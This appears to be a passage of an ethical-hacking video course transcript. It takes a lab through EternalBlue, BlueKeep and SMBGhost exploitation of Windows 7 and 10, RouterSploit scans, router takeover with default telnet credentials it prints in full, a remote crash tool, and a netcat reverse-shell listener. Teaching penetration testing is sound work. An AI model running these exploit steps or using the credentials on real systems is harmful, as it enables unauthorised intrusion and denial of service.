pulsar. So just type Eternal Blue _ double pulsar. Click enter, and now we got our exploit imported in Metasploit framework. This is an exploit that we didn't have before. Let us show information for it. As it says in the description, this module exploits a vulnerability on SMB version 1 and version 2 protocols through Eternal Blue. After that, double pulsar is used to inject remotely a malicious DLL. Great. Let's also show options to see what options we got. And up here, we got quite a few of them. And keep in mind that all of them are required. Now, here it tells us that we need to specify the path to the deps directory. So it seems that I made a mistake before. I copied it directly to the root directory and we had to copy the entire file. So what I'm going to do is I'm going to open a second terminal, enter the root terminal, go to the desktop of our Mr. Hacker account, and copy this entire Eternal Blue double pulsar Metasploit to the root directory. So copy Eternal Blue to the /root. Make sure to add -r because we're copying a directory, and right now this path should be good and we should not really change it. We can just leave it right here, since deps directory is inside of the Eternal Blue double pulsar directory and we just copied it to the root directory. So these two are good. Under the process inject, it tells us right here name of the process to inject to, and we must change to this process name right here for 64-bit machines. Since my Windows 7 machine is a 64-bit, I will type this name right here. And I will change the process to inject since it is not set right here by default. So type set process inject and paste the name of the process and press enter. If your Windows 7 machine is a 32-bit one, you can leave this wlms.exe process to inject to. The R hosts we already know to be the IP address, so 192.168.1.8. The R port we're going to leave to 445. The target architecture, if your Windows machine is a 32-bit, you can leave it to x86. My is 64-bit, so I will set the target architecture to x64. The wine path, and this is why we needed the wine for. We need to set the wine path in order for all of this to work. And right here it is set correctly. Remember, our .wine folder is inside of the root directory, and the drive C folder is inside of the .wine directory. So this is something that we will not change. Another configuration that we want to do is this payload options right here. It is currently set to Windows Meterpreter Reverse TCP. And remember, in one of the last few videos I told you that this is a payload for 32-bit Windows. If your Windows is 32-bit, once again, you don't need to change this, but if it is a 64-bit Windows, I want to type set payload Windows x64 / meterpreter / reverse TCP. Show options once again. Everything seems to be good now. You can also show targets if you want to, just to see what are all the possible targets that you can attack with this exploit. And once you check all of that out, you can just type run. This will launch our Eternal Blue Double Pulsar exploit on the target machine. It might take a few seconds for it to work. And here it is. Our Meterpreter session is once again open. Exploit works successfully, and we can once again run the commands on the target system. We can enter a shell and get its command prompt. If I type who am I, it says that we're the system level account, so we're the highest privilege account once again. Great. Now, I know that you're impatiently waiting for us to cover this Meterpreter shell and all of its commands, as well as the post-exploitation modules that we can run with it, but hang on for just a little bit more. We got 2 more exploits to cover, and then we can proceed to creating our malicious files and using them, as well as running post-exploitation modules. In the next video, we're going to cover an exploit called BlueKeep, which was discovered in 2019. See you there. Welcome back, and we right now have to cover another vulnerability for Windows. This vulnerability is called BlueKeep, and it came out in 2019. This is a remote desktop protocol, or RDP vulnerability, and what is so special about it? Well, as it says right here on this page, this latest RDP vulnerability could allow hackers to remotely run code at the system level without even having to authenticate. In other words, any unpatched Windows system from XP to Windows 7, so these are our targets, with an exposed RDP port is a potential target. So this is a serious vulnerability. Matter of fact, many people link it to be as high vulnerability as the Eternal Blue was, which we already covered and which came out in 2017. We can read more about it right here, but as usual, our most important thing is to see how we can exploit it. You can go to this page if you want to find out more about the BlueKeep vulnerability. It even gives some code examples as to what the vulnerability was and how it got patched. Down here, we can see what systems are affected. We got Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Server 2003, Windows Vista, and Windows XP. Exploit potential, it is a remote code execution, as the Eternal Blue was, and number of potential victims are around 1 million. Now, for this attack to work, there is one thing that needs to be enabled on the target system, and that thing is port 3389. Now, this port 3389 is used for remote desktop protocol, and it is often used inside of big and large companies. You will most likely never see it on home devices, unless it is purposely enabled, but in order for us to be able to exploit it, we must enable it on our Windows 7 machine. So what I'm going to do is go to my Windows 7 machine and open the Kali Linux as well. In order to see whether it is enabled, we can use our regular good old nmap, so we can type sudo nmap-ss 192.168.1 and let me check the IP address. ipconfig.8. Perform the scan on your Windows 7 machine, and in just a few seconds we should get results of which ports are open. And right here, we do not see port 3389 being open. This means this target is not vulnerable, because that port is closed. In order to make it vulnerable, all we need to do is open the remote desktop protocol. So go to the control panel, System and Security, then under the System, on the side you will see this Remote Settings, click on it, and down here check Allow Connections from computers running any version of Remote Desktop. By default, it should be Don't Allow Connections to this computer. And as I already mentioned, many large companies have this enabled. We just click on Apply, click on OK, we can close this, and if we run the scan once again, right now we will have 3389 port open. Let us see whether it is vulnerable or has it been patched. If I open MSF console, and the exploitation is similar as it was with the Eternal Blue. We got the auxiliary module that will tell us whether the target is vulnerable without exploiting it, and then we have an exploit that will gain access to the target and give us the Meterpreter shell. So what we can do is we can just type the vulnerability name, so search BlueKeep, press enter, and we will see two results right here. As I mentioned, the auxiliary module and the exploit. So let's go with the auxiliary module first. We copy its name, we use, and then paste the name of the auxiliary module. Clear the screen, show information. This module checks a range of hosts for the BlueKeep vulnerability by binding this channel outside of its normal slot and sending non-DOS packets which respond differently on patched and vulnerable hosts. So this is the way that it will figure out whether the target is vulnerable or not. Let's see what options we need to set. So show options. And there seems to be a few of them. We got the R port, which is 3389. This is something that we will not change. We got the R hosts. So let's set it to the IP address of the Windows 7 machine. We got these four options right here as well, but the only one that is required is this RDP client IP. And it says right here the client IPv4 address to report during connect. And this pretty much doesn't matter. It can be any IP address. For example, I will just leave it to be this one, even though this is an IP address that I do not have on my local network. But I will just leave it on this. And if I go right here and type run, it will tell me the target is vulnerable. The target attempted cleanup of the incorrectly bound MS-D120 channel. This means it is vulnerable. Let's use the exploit to gain access. So use exploit Windows RDP, and then let's check our possible options. We want to go with the CVE 2019 BlueKeep remote code execution. If I show info, down here it will tell you how exactly it exploits the target. And if I show our available options, so we got pretty much the same options as with the auxiliary module. We got the RDP client IP, which is this one, and we are not going to change it once again. These options are not required, so we're not going to specify them anyway. The R hosts we want to set to the IP address of Windows 7 machine. The R port is set correctly. The payload is set to Windows x64 Meterpreter reverse TCP, and this is also something that we do not want to change. Is this the only payload that will work? Well, most likely, since if I go to show targets, you will see that this exploit targets only 64-bit machines, so it will not be able to run on a 32-bit machine. So by this, it seems that 32-bit Windows 7 machines and Windows Servers 2008 are not vulnerable. Which we really don't care, because 99% of machines are 64-bit. And these targets right here is something that we must choose from. Now, this is for default and normal Windows machines. And right here we have targets for the virtual machines. And this is something that we must set. If we leave it on automatic, it should figure out on its own that we are running Windows 7 inside of a virtual box, and it will perform the exploit for the VirtualBox Windows 7 version. But if we, for example, set this one, the exploit should not work. So we must set the target to 2, in case we are running the Windows 7 inside of a VirtualBox. If we were attacking a regular Windows machine that is vulnerable, we would set 1. If we were attacking a virtual machine from the VMware station, we would set one of these 3, and we would set these 2 accordingly as well. So let's triple check our options. Everything here is set. The payload is a 64-bit payload, which is good, and the target is Windows 7 inside of a virtual box. Great. Let us run the exploit. It tells us that the target is vulnerable, and in just a few seconds we should get the Meterpreter shell opened on that Windows 7 machine. And after 30 to 40 seconds, here it is. We got Meterpreter session 1 opened on the target machine. If I type get user ID, it will tell me that we are system. Once again, the highest privilege account on that target machine. We can perform the commands as usual. Enter the shell, type hostname, we are test2 PC, ipconfig, gives us the IP address of the target machine, and all of these things that we're already familiar with. Great, another Windows 7 vulnerability covered. So, what is the important thing that we learned from this video? The vulnerability is called BlueKeep. It is a critical RDP or remote desktop protocol vulnerability, and in order to exploit the target, it must be an unpatched 64-bit Windows XP to Windows 7 machine, including Windows Server 2008, and it must have RDP enabled and port 3389 open. Where are these machines most likely to be found? In large companies. So once again, most likely we will not see these types of targets in home networks. Okay, great. Now that we covered Windows 7 vulnerabilities, time to go on to exploit Windows 10 machine. See you in the next video. Welcome back. In this and in the next video, I want to talk about something different. We attacked different machines from Windows machines to Linux machines, but in these 2 videos, I want to show you that you can also target your own router, or the router from the network that you're attacking. Now, it might seem that it is not that important to test your router, but once you gain access to the router, you pretty much have the control over the entire network. And not only that gaining access to the router is powerful, it means that you can change different network settings, that you can forward different ports and so on, the routers are also the easiest devices to hack. You might be asking, why? Well, because usually 90% of home routers and home devices have default login passwords. The vendors who provide homes with their routers never really change the default password, and default password is something that you can find on the internet. These default password attacks we're going to check out in the next tutorial, but for this one I want to show you a cool tool that you can use to test on your own router to check out whether it is vulnerable to some exploits. So just type in your search bar routersploit and it will lead you to this GitHub link where we will have our routersploit tool. Now we already know how to download all of these GitHub tools, so let's copy the link straight away, navigate to our desktop, and we can git clone routersploit. While this is copying, let's go down to the installation commands just to see how we can install this tool properly, and here we have installation of Kali Linux and all of the commands that we must run. So we must install python3.pip, even though I believe we already have this. Let's run the command just to make sure, and it requires root privileges, so let's enter the root account first and let's type the same command, apt-get install python3.pip. Everything is installed. Let's move on to the next command. We already did the git clone. Let's change the directory to routersploit. And the next command is python3 and then install the requirements. As we can see, inside of the routersploit directory, we have requirements.txt file. And whenever you have this requirements.txt, we already know that we must run this command to install all of the requirements from that file. Let's press enter. As soon as it installs all of these files that it needs, we should be ready to run the routersploit tool, which is this rsf.py. Okay, so everything has finished, and let's Python 3 rsf.py. And you will notice that once you run this tool, it will open something that looks similar to the MSF console. We get this command line type, and here we can execute different commands. It says right here that it has 132 exploits, 4 scanners, 171 credential attacks, 4 generic attacks, 32 payloads, and 6 encoders. Now, to check out all of the available commands, we can run help command, and it will tell us how to use a certain module, how to execute a shell command argument, and here we can also search for different tools. Now, if I type search scanners, it will give us all of the 4 scanners that it has. And in this video, we're going to use this AutoPWN scanner. This will test for all the exploits from the Routersploit tool onto our target router to see whether it is vulnerable to any one of them. So let's type use scanners and then AutoPWN. Once you select it, you can type help, or pardon me, you can type show options, the same way that we do inside of the MSF console, and the only thing that we must set is target IP address. To do that, we can type set target 192.168.1.1. This is the router in my case. If you want to check out your gateway or your router, you can type the command netstat-nr, and under the gateway, you will have the IP address of your gateway. Once you check it out, type it right here, and as soon as you set your IP address, you can type run. As it says, it will start the vulnerability check, and it will go through all of these exploits and see whether your router is vulnerable to any one of them. If you have this minus sign, that means that the router is not vulnerable. If you have this star sign, that means that Routersploit cannot really determine whether your router is vulnerable to this security threat. As it says right here, it could not be verified. And if you have a plus sign, which we don't have at the moment, that means it found a security vulnerability for your router. In my case, I believe I don't have any at the moment, but you might find some vulnerability for the router. Let's wait for this scan to finish. And it is done. It says could not confirm any vulnerability, and it couldn't find default credentials. And this part right here is not exactly true. We're going to check out default credentials in the next video. However, you can test these exploits with the Routersploit tool. You can also check out these ones that says could not verify exploitability. This could possibly mean that they are vulnerable to these attacks, or this exploit is simply just not the type of exploit that targets your router. Okay, now that we covered the Routersploit tool, we're going to see how we can gain access to the router with the default credentials vulnerability that at least 70 to 80% of home routers have. See you in the next video. Welcome back. Time to check out the default credentials vulnerability on your router. Now, this tutorial is something that you cannot follow, because this is going to be different for every type of router that someone has. I can just show you the process of how I went and discovered the default credentials, and you can try to do the same thing in order to see whether you can gain access to your router. So the first thing that I did is I typed netstat-nr to check out the IP address of my gateway, which is most likely going to be the IP address of your router. Then I went to Google Chrome and visited that IP address. If you do the same for your router, it will most likely lead you to some type of a login page where it will ask you for the username and the password. Once you type the username and the password, you will have access to the router settings, and you will be able to change a few things here and there, from setting up wireless to port forwarding and similar settings like that. Now, if you haven't changed the default password for your router, you will most likely be able to find it on the internet. Which I did. I just searched the name of the router that I have right here, and I found the username to be telecom and password to be telecom. Nobody changed this username and password, therefore they're exactly the same. And we even get this warning that says a data breach on a site or app exposed your passwords. Chrome recommends changing your password for this IP address now. We're going to click on OK, and pretty much we already gained access to the router settings. We can set up the firewall, VLAN settings, we can check out different settings that we have right here. We have some security settings right here. We also get the port forwarding, which we can perform. And this is something that I tested on multiple home routers, and many of them appear to have default credentials where it allows you to log into the router and change these type of settings. But these are not the only default credentials that you can find. For example, if I go right here and I run an nmap scan with -st command on my router IP address, I will also discover that it has some ports open. For example, it has this telnet port open. We already know how we can connect to the telnet. We can type the command telnet and then the IP address of the target that we want to connect to. If I press enter, we will get another login screen. So if I type something like telecom once again, it will tell me that the password is incorrect. So after 3 attempts, it simply just closes the connection to the router. And I figured, well, if the router default credentials weren't changed, then probably I can find the telnet credentials as well on the internet. And after a few minutes of Googling, I ran across this website where I scrolled a little bit down and I found this post that was posted by someone. It says my router name, which is this one, and we can compare it right here. It is the same name. And we get the username and password. We also get how we can enable the shell inside of that router. So let's give it a try. The username is admin and the password is this. Let's go and run telnet once again. Type username to be admin and password to be ZTONPK. And here it is. We're inside of CLI. Now, the next thing that this person does is it types enable. Then it enters the password of ZTE and then it enables shell. Let's give it a try. If I type enable, type ZTE, and then shell, another login attempt. But luckily, this person also provided us with username and password for that. This is something that we will most likely never be able to brute force in case we didn't know, because this is a really strong username and strong password. However, it is default one, and this is something that we can find on the internet. For your router, of course, this will not be the same, but you can go through the same process of searching for the default credentials. Just figure out the name of your router, type it in Google, and try to find some default credentials. For example, we notice that I have open port SSH and Telnet. You might be able to target SSH and not Telnet, or you might be able to target some different port. It could all depend on your router. However, now I'm targeting Telnet, and let's go and type in the username and password that this person sent us. So I have it written on my left screen, and I will type FNNSD3ZXHNH168NV31. For some reason it says bad username. Let's try once again. Maybe we typed something incorrectly. So let's go admin, password, let's enable. The password is ZTE, and let's go into shell. Here we want to type FNNSD3ZXHNH168NV31, which is the login, and the password is ZXHNH168NV31. And here we are. We are inside of the shell. If I type ls, we're going to be able to see the files on our router. I can type the ifconfig command to be able to see all of the interfaces that our router has. Here the first interface has the IP address of 192.168.1.1, and down here we're also going to be able to find the public IP address, which is right here. Okay, great. We have gained access to the router. We can also go and change directories to different directories if we want to. We can run different commands that you can usually run from your terminal, and that's how you can gain access to your router with default credentials. Now give it a try on your own router, try searching the name of the router, first try logging into this page right here, which will grant you an access to some of the router settings. And even if you don't manage to do that, try scanning your router with Nmap, figure out whether it has some interesting ports open, and then target those ports with default credentials that you might manage to find online, just like I did right here. Okay, now that we covered this, we're ready to continue with our exploitation section. See you in the next video.
Hey everybody, I want to take a quick break here. Go grab a coffee, grab a tea, just take a break from all the learning that you just did. And I want to talk to you quickly about imposter syndrome. It's this idea that you're not good enough, that things are too complicated for you to ever achieve what you want to achieve. You look at other people, at other industry experts, and you say, I will never get there. But it's just a symptom of learning. This idea of you not being good enough simply means that, well, you're just not there yet. Things take time. If you want to learn a valuable skill, well, it's hard work. That's why it's valuable. Remember how you felt on the first day of going to school, first day on a job. It's the same experience. But over time, with repetition, with practice, you get comfortable, you get experience, and you slowly start to lose that imposter syndrome. Now, this idea of an imposter syndrome is great. It means you're doing something worthwhile. So don't use it as a negative. Use it as an encouragement that you're doing something good, that you're learning and you're stretching your limits. So with this break, I want to propose that we do a quick exercise. I want you to stop the lectures. Again, grab a coffee, grab a tea, and head on over to our Discord. Now, in our Discord server, if you've used it up until now, that's great. If you haven't, head on over to this server, and I want you to do something that I think it's super important to learning. And that is using what you've learned up until now to actually teach someone or help someone. So you can go all the way to, let's say, the coding and courses section and pick a topic that you want to help somebody in. So let's say you go to the Python channel. And in here, you'll have other students that are asking Python related questions. Now you can scroll through here and see if you're able to help someone. Even though you may not have the experience or the knowledge yet, this idea of practicing and explaining what you've just learned to other people, even if you're not 100% certain, actually is beneficial to your learning. Because if you're never teaching, if you're never explaining and vocalizing and showing what you've learned, you'll always be a beginner. This idea of teaching what you learn is a very important concept. So moving forward, as you go through the lectures, anytime you feel like taking a break, hop on over to Discord and help somebody. Our motto here is that we're always kind. We don't judge anybody. We're all just beginners here. We're all learning. So don't be afraid to answer things, because you got to remember, nobody's perfect except for Yoda. Yoda is pretty perfect. All right, I'll see you in the next one. Bye-bye.
Welcome back. In this small section, we're going to cover SMB Ghost Windows 10 vulnerability. Since there is no module available for the Metasploit framework regarding this vulnerability, we are going to need to exploit it manually. And by manually, I mean we will have to find a working exploit ourselves, run it ourselves, and redirect the connection to our Kali Linux machine ourselves. All of these tasks Metasploit framework did for us automatically, and since we can't really rely on tools, we're going to learn through this Windows 10 vulnerability how we can do all of that ourselves. Now, the vulnerability that we're exploiting is rather new. I believe it got disclosed in June 2020, and for this we will need to install Windows 10 Virtual Machine. Not all versions are vulnerable since it got patched, so we will have to install a vulnerable version of Windows 10 Machine. Since this as well is an SMB vulnerability, we won't need any additional software to run on our target machine for this exploit to work, which makes it even more dangerous, just like the previous two vulnerabilities, which were Eternal Blue and the Blue Keep, but they were attacking Windows 7. This one attacks Windows 10. All our target needs to have is port 445 open and some previous version of Windows 10. The exact vulnerable version that we are looking for is either Windows 10 1903 or Windows 10 1909. So you will need ISO file as usual to create this machine, and both of these versions are vulnerable to the SMB Ghost attack. Let me show you right now where we can download a previous version of Windows 10 ISO file. And by the way, we will be using this Windows machine in the next section as well to test the payloads that we will create. But more about that later on. For now on, let's focus on creating our virtual environment for this attack. So what you want to do first is you want to navigate to this rufus.ie website, and this software right here that we're going to download is used to create bootable USB drives with the ISO files. Now, you might be asking, well, why are we going to need this? We're not going to boot into our computer over USB drive, we are installing a virtual machine, and that is true. But this software also offers us to download some previous versions of Windows 10 operating system. That's why you want to go down here, click on this Rufus 3.11 and download the file. It is the size of 1.1 megabyte. Once you download it, you should be having this file right here on the desktop. Double click on that file and it will ask for the administrator password. You want to click on yes or type in the password. And right here where we want to go is this arrow next to the select button. Now here's a small advice. Sometimes this arrow right here will not appear, and it actually didn't appear to me once I downloaded the software for the first time. So what I did is I tried restarting this program several times, so just close this, open this again, close it and open it again. That might work, and what also might work is going right here to the application settings and changing this check for updates. Then click on close, restart the program, and eventually this arrow right here should appear. Once it appears, click on it and click on download. And once you select the download, click on download once again, and this will start running download script. In just a few seconds, you should have this small window pop up. Here we want to select what operating system we want to download. If I click on here, it will ask me if I want Windows 8 or Windows 10. I want to select Windows 10, click on continue. In the next step, it will ask me which exact release do I want to select, and right here we want to go with this one, which is 19H1 build 18362.356, and it says right here the date is 2019 September or 9th month. So click on this right here, then click on continue. You can select Windows 10 Home, click on continue here as well. Language we can leave on English. And the last step, which is architecture, we can leave on x64. Then you can click on download right here, or you can download using a browser. If you simply just click on download, it will open the file explorer, and here you can pick where you want to save it on your desktop. Keep in mind that the size of the file is around 5 gigabytes, so this will take some time. Since I already have it downloaded, I will not be downloading it again. For you, just wait for the download to finish and you should have a Windows 10 ISO file ready. Make sure that you pick the exact same version that I did right here, and once all of that is finished, you can close this program. The next step is to install Windows 10 Virtual Machine. So I already got one running right here. And for you, you can do it the same way that we did with any other machine. So just type Windows 10, select right here Microsoft Windows, Windows 10 64-bit, click on next, choose 2 gigabytes of RAM or choose the same amount of RAM that you used for the Windows 7, click on next. Here we want to create a virtual hard disk. All of these steps we can next. Here I got 25 gigabytes in my case, and you can choose whatever you want right here. And this will create your virtual machine. Now, since I already have it, I will delete it, but before I delete it, another two settings that you want to choose is, as we did with the Windows 7 machine, under the storage, under the empty, you want to remove, and you want to add the Windows 10 ISO file, which I have right here. The next setting that you want to change is from NAT to bridged adapter. Once you do all of that, you can start the process of installing Windows 10. Now, there is not any important step in Windows 10 installation, so you can do it however you want. But just a pro tip, once it gets to the part where it asks you for the account creation, where you need to specify an email address and all of that, you can skip that part by unplugging your device from the internet, and then it will allow you to create an offline Windows account, so you won't need to create an email for the Windows 10 account. All of the other steps are not important, you can do them as you like, and once you do all of that, you can start your Windows 10 machine. Another thing that we need to do to get our Windows 10 machine fully ready for this attack is to disable the firewall. So go down here, type Control Panel, and the way we disable it on Windows 10 is the same way that we disabled it on Windows 7. So click on Control Panel right here, click on System and Security, click on Windows Defender Firewall, and turn it off in this button right here which says Turn Windows Defender Firewall on or off. Mine is currently off. Once you do that, everything is ready and you should be good to go for the next video where we are going to try to search for the exploit for this particular attack. See you in the next video. Welcome back. And now that we got our Windows 10 machine set up, we want to perform a vulnerability scan real quick to see whether it is vulnerable, and then I will show you a tool that we can use to crash the target system. So first of all, open up both of your Kali Linux and Windows 10 machines. Right here I ran the ipconfig command to check out the IP address of the Windows 10 machine, and what I'm going to do is I'm going to scan it real quick just to see what ports it has open and whether our setup was correct from the previous video. Okay, great. We got the port 445 open. That is all we need. Now, I have also performed a Nessus vulnerability scan this morning on Windows 10 machine, and for some reason it didn't manage to find this SMB Ghost vulnerability. Now, that could be some type of a bug, maybe, perhaps, since if I type locate and then the vulnerability name, which is CVE-2020-0796, and this is just the name for this particular vulnerability, and I type enter, here it will find the path to the Nessus with the module for that vulnerability. So it seems that it has a plugin for that vulnerability and it should be able to discover it. But once again, for me personally, it didn't manage to find it. You can try it out. You know right now how to use Nessus, so just open it up, open your Windows 10 machine and run a scan in Nessus on your Windows 10 machine and see if you can come up with this vulnerability from there. But what we want to do right now is we want to copy this name and we want to go to the Firefox. Since, remember, this is something that we do not have in Metasploit framework, we must find the exploit ourselves. Once the Firefox opens up, paste the vulnerability name right here, and I will just type it real quick, so 2020-0796. And we can add GitHub. Let us check out whether there are some available tools on GitHub repository. So we got a few responses right here. And what we want to go with first is the vulnerability scanner. And what I mean by vulnerability scanner is we want a tool that will tell us whether the target machine is vulnerable to this attack without crashing or exploiting it. So I will go to this link right here, and it seems that this is the tool that we need. It says the vulnerability name, scanner.py, identifying and mitigating the CVE 2020-0796 flaw in the fly. So let's check it out. Let's copy the name of this vulnerability. Then we will go to our desktop and we will git clone that repository to our desktop directory. Once it finishes downloading, we can type ls. Here it is, right here. Let's change directory to there by typing cd, and let's see which files we have. So we have only this scanner.py file. So it is a Python file. Let us go to this page and just check real quick whether it is a Python 2 or 3 program, and by the usage that we can see right here, it seems that it is a Python 3 program. So let's test it out. If I go right here, check out the IP address of Windows 10 machine. For me it is 192.168.1.5. Let's run the program, Python 3, and then type the IP address. Well, we get a response that we wanted. It says right here, vulnerable. Great. Now we can test other tools that will crash and exploit the target. First, I want to show you a tool that you can use to just crash the target. And with this tool, we don't need anything else besides the IP address of the target machine. So you can crash any target just by knowing its IP address. For the exploit that we will cover in the next video, we're going to cheat a little bit. We need something in order for the exploit to work. And I will show you that in the next video. For now, we want to see how we can crash the target machine. So if I go all the way down, you will see this GitHub link. It is from Gian Sitting, and it has the name of our vulnerability. If I go right here, we can see we got a few files. Once again, this is a Python tool. Under here, we got the usage, so we got a demo GIF. Here we can see the command that he is running. And if we go right here and copy the tool, and once again, we can go to our desktop and git clone the tool name, the link, paste right here, wait for the download to finish, and if I type ls, we now have two directories. This one is the scanner, and this one is the one that we just downloaded. So let's go cd, cve, we got the demo GIF, the readme file, and the vulnerability itself. Of course, if we want to, we can nano the vulnerability file or the Python file, and we can scroll all the way down to see the code of this exploit, and down here we get the usage. So all we need to specify, as it says right here, is the target IP address. Let's try it out. If I go right here and type Python, I believe it's Python 3 once again, and then cve.py, and then the IP address of the target machine. Before I run it, I will lower the screen so we can see both of our targets before running this program. And right here, if I press enter, well, here it is. We successfully crashed the target machine. It got the blue screen of death, as we can see right here, and it is now restarting. And this is also a critical vulnerability. Once again, I need to mention that you should never be able to crash the target machine just by knowing its IP address. This is something that we would also 100% write down inside of our penetration testing report. Now that we managed to scan the target to see whether it is vulnerable, and we used another tool to crash the target, let's see in the next video how we can exploit the target machine and gain shell back inside of our Kali Linux machine. See you in the next video. Welcome back. Time to gain access to our Windows 10 machine using the SMB Ghost vulnerability. For now, we managed to scan it to see if it's vulnerable, and we also managed to find a tool that we can use to crash the target system. But ideally, we don't want to crash it. Instead, we want to gain shell on that target machine. Well, with this vulnerability, it is not that easy. There are some things that we need to know in order to be able to remotely exploit it. Let's see what I mean. The first thing that we must do is we must download a tool that we are going to use for the exploitation. And I already checked a few of them out, and I found the best working one to be this ZecOps CVE vulnerability. If you just type the same thing that we typed from the previous video, which is the vulnerability name and then GitHub, you should find this ZecOps link to be on the first page. Click on it, and down here we can see the files that we get, and right here we also see the usage of the tool itself. But before we get into all of this, let us first download the tool from GitHub. So let's copy the link right here, copy, go to our terminal and type git clone and then the tool link. Press enter, and here it is, it finished downloading. Let us type ls, and we will see a bunch of these directories with the same name. This one, however, has this extension of RCE and then POC, which stands for Remote Code Execution Proof of Concept. Let's change the directory to that directory. And if I type ls right here, we're going to see a bunch of files. So we get this .bat file, which runs on Windows. We get this SMB Ghost assembly shellcode for the 64-bit version. And we get this Python SMB Bleeding Ghost file, which is the exploit itself. But we don't really know how exactly do we combine all of these files. So let's go back to the page and check out the usage of the program. The first step right here tells us that make sure Python and NCAT are installed. Then run this .bat file on the target computer and adjust the offsets at the top of the SMB Bleeding Ghost.py file according to the script output. What does this mean? Well, let's go to the Python file first. Let us nano it to see what offsets do they mean. And I assume they mean these offsets right here. As we can see, there are 5 of them, and they have different offsets. But you might be asking, well, it tells us right here that we must run this on the target computer. And what's the point then of calling this an exploit if there is a file that we must run on the target computer first? Well, let's go to the note down here. As it says, you might be wondering why it is necessary to run the .bat file script on the target computer. And doesn't it defeat the whole point of the remote code execution being remote? Well, here is the explanation. These offsets are not random and are the same on all Windows instances of the same Windows version. One could make the attack more universal by detecting the target Windows version and adjusting the offsets automatically, or by not relying on them altogether. What does this mean? Well, these offsets right here are the same for the same Windows version. So for example, this Windows version that we got right here, if we had 1,000 machines that were running the same Windows version, well, it is enough that we run this .bat file on this one to check out the offsets, then we adjust the offsets right here inside of our exploit, and then we can attack all the 1,000 machines without having to run the .bat file on them. But a different version of this Windows machine might have a different offset, which will then make our exploit not work. So we must check the offsets first. How we're going to do that? Well, as it says right here, we're going to run the .bat file on the target system. So I already downloaded the tool right here on my Windows machine. Here it is on the desktop. And what you can do is you can just open the Windows 10 machine, open the Internet Explorer, type the vulnerability name and then GitHub, navigate to the ZachOps tool, and then if you click on it, click on this code arrow right here, and click on download zip. This will download the tool for you, and you should have it right here on the desktop right after it. Great. Once you do that, what we can do is we can navigate using our terminal to that tool, so cd desktop and then cd cve. If I type dir right here, and I run the bat file, of course you can run it using command prompt, or you can just double click on this file and double click on the calculate target offsets. As we can see, this will open another terminal, and this will give us those 5 offsets for this particular Windows 10 version. What we must do right now is we must change these offsets to match inside of our Python file right here. So let's check it out. Here we got 2D170. The first one is the same. 32210. The second one is also the same. The third one also appears to be the same. The fourth one is different. Here it ends with 370 and here it ends with 410. So let's change that first. Let's type it 370. And the last one is also different. So here it is BAFA8. And here, if we change it, BAFA8, now everything is good. So if we Ctrl O to save this exploit, now we should have a working exploit. We can close this. We don't need it anymore. We can also close this. And if I go back to the page to check out the next step, it tells us run ncat with the following command line arguments. So the purpose of running ncat is because once we exploit the target and we run the payload, it must connect to somewhere. Now, this listening for the incoming connection Metasploit framework did for us automatically. Right now, we must do it ourselves, and we're going to do it with the help of NCAT. So to listen for the incoming connection, we can type NC and then -LVP and then the port number. In this case, let us listen on port 4444. This will listen for the incoming connections, and once we run the exploit, the target machine will try to connect back to this port number right here on our IP address. Therefore, right after it, we should have a shell pop-up right here, and we should be able to execute commands on target machine. Great. Let's check out the next step. The next step is to run the .py file while following the command line arguments. So the command that we must run is the file name, then the target IP address, then the Kali Linux IP address, and then the port that we're listening on. And this reverse shell IP is just the IP address of the machine that you're listening for the incoming connections. And you get the explanation right here as well. So let's try it out. We're listening right here already, and let us run the file right here. We're going to use Python 3, smb bleedingghost.py, then comes the target's IP address, which is in my case 192.168.1.5, as it says right here. Then comes the IP address on my Kali Linux machine, and I'm going to check it out inside of a third terminal real quick. It is .1.12. So let's type it right here, and the last step is to specify the port number that we're listening on, and in our case that is the port 4444. If I press enter, we get an error that says no attribute WinDLL. And I knew this error will come up. The solution to this is to run the exploit from a Windows machine. So this file right here must be ran from another Windows machine, and then we can redirect the connection to this Kali Linux machine to pop a shell. Why is that? Well, this ctypes library has no attribute WinDLL, which is only to be ran in a Windows environment, I believe. So let's test it out. For this, I'm going to use my main Windows 10 machine right here to run the exploit, and I will redirect the connection, once exploited, to the Kali Linux machine that is already listening for the incoming connections. Now I know it sounds a little bit complicated, but let's give it a try. I already downloaded the exploit right here. Here is the file containing all of the other files. And if I open my command prompt, then I navigate to this directory right here containing the exploit. What I'm going to do is I'm going to run the exact same command that I ran previously on my Kali Linux machine, just this time I will be running it from my main Windows 10 machine. So the IP address of the target is first, then comes the IP address of the machine that is listening for the incoming connections. And this might sound confusing, but this is still the IP address of our Kali Linux machine. If you want, however, you can also connect back to this Windows 10 machine, but in that case you must install netcat for Windows and listen using netcat from a Windows machine. And then right here you would specify the IP address of the Windows 10 machine that is running the exploit. Since there is no need for me to do that, I will just specify the Kali Linux IP address, and the port number is 4444. Great, the command is here, and if we execute it, it will start the exploit, and sometimes this exploit will crash the target, as we can see right here. The first try of running this exploit crashed our target machine. And this is something that you must get used to once running these type of exploits. So what I'm going to do is I'm going to Control-C this to quit this exploit. And then what I'm going to do, clear the screen using CLS command, and I will run this command once again. Just I will wait for this Windows 10 machine to boot up once again. And we're going to give it a second try. And now that we're logged in, I will run the command once again. Now there is a chance that it will crash once again, but hopefully it will not. And here it is, it crashed once again, so I'm just going to restart it again real quick and then run the exploit for the third time. Hopefully the third time it will work. Okay, here it is, and hopefully the third time will be our lucky run. Let's run the exploit. For now, everything seems to be working. We haven't reached this point in the past 2 tries, so hopefully right now the target will not crash. And what we're looking for at the end of this is, after the exploit is done, we're looking to gain a shell right here inside of our Kali Linux machine. So let's wait for this to finish. It tells us right here, wrote shellcode. And if I go to my Kali Linux machine, here it is. We got the shell on our Windows 10 target machine. If I type who am I, we are the system level account, so we're the highest level account possible. If I type ipconfig, just to check whether we have the same IP address, and that indeed is the same machine. So we successfully exploited the Windows 10 target machine. Just for this, we had to use a Windows machine to run the exploit because of some libraries inside of the Python file. And if you notice right here, it tells us that if we disconnect and if we exit this exploit, the target will probably crash. So what we would want to do is we would want to execute all of the commands that we want to execute, do what we need to do on the target machine, and then after we've done and we've exited the shell, we can go right here, stop the exploit, and once this exploit has been disrupted, that will again crash the target machine, as we can see right here. Just this time we managed to run the shell, we managed to execute commands on the target machine for as long as we wanted before crashing the machine. So the goal right here is to first gain the shell and then the machine will crash and not crash the machine at the beginning of the exploit. But that is something that we do not have control of. So sometimes you will gain the shell and sometimes you might crash the target machine. Okay, great. So we successfully exploited Windows 10 machine. We did it manually with the help of tools that we found online. We also set up our own listener that was waiting for the incoming connections. And right now that we covered all of these vulnerabilities, starting from 